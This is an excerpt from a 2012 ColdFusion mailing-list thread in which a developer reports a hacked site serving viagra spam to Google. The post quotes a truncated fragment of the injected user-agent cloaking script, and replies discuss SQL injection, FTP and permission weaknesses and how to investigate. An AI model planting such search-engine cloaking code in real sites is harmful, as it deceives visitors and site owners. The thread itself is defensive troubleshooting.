Recently a site of ours got hacked - basically, a Google search the site
was returning viagra info!
What we got was a small script added to the end of a functions.cfm file:
cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /cfif (Find(
google, REQUEST.UserAgent ))
cfhttp method=get
LOL. Wow. That's a very funny script! Not funny that it happened to you, of
course, but that's just awesome.
Issues like this are typically caused by either SQL injection (i.e. didn't
use cfqueryparam) or some sort of FTP vulnerability. My first step would be
to make sure that *every* cfquery
Issues like this are typically caused by either SQL injection (i.e.
didn't use cfqueryparam) or
some sort of FTP vulnerability. My first step would be to make sure
that *every*
cfquery that accepts any input of any kind from users is utilizing
cfqueryparam.
Everything is paramed to the
It doesn't have to have queries on it. Does it output data?
That said, it sounds like some other sort of exploit.
On Tue, Nov 13, 2012 at 3:30 PM, Les Mizzell lesm...@bellsouth.net wrote:
Issues like this are typically caused by either SQL injection (i.e.
didn't use cfqueryparam) or
I think it sounds like one developer was trying to destroy your search
ranking by giving googlebot to an obvious spam page. (don't they know
about robots.txt?) Too bad for you guys, google now makes a web browser,
and thus your problem. No standard exploit will inject CFML into a page
unless
Recently a site of ours got hacked - basically, a Google search the site
was returning viagra info!
What we got was a small script added to the end of a functions.cfm file:
cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /cfif (Find(
google, REQUEST.UserAgent ))
cfhttp method=get
I've seen something like this on a shared server that was running
osCommerce. The uploads directory had the wrong permissions set, the
attacker uploaded a server admin script that could set permissions on other
directories. They were then able to inject code into every index.php,
index.html,
Just to put the record straight it is entirely possible to create files
using SQL scripts if permissions allow it.
That SQL Injection was possible was demonstrated to Allaire by putting a
file in the C:\ directory of their main production website using SQL
Injection... :-)
On 14/11/2012
firstly you should try to determine when the hack was done.
check the last modified date of the file in question (unless you have
already edited it since).
Then ask your host to check the FTP logs for that date and see if anyone
accessed that file on that date, this will rule out FTP as the
I think it sounds like one developer was trying to destroy your search
ranking by giving googlebot to an obvious spam page. (don't they know
about robots.txt?) Too bad for you guys, google now makes a web browser,
and thus your problem. No standard exploit will inject CFML into a page
Everything is paramed to the hilt - I sanitize all form vars BEFORE
the query, and then use cfqueryparam on top of that ... so I'm guess
we're looking at a ftp vulnerability.
What about URL, CGI and Cookie scopes? All of those can cause the same problems.
Question though - how could an
...lax server security. We've got a boatload of stuff on this site
to prevernt SQL injection, including Justin D. Scott's application
script, carefully checking anything to goes into the database, ...
I haven't looked at the rest of the thread yet, but I would note that
the script I wrote is
12 matches
Mail list logo
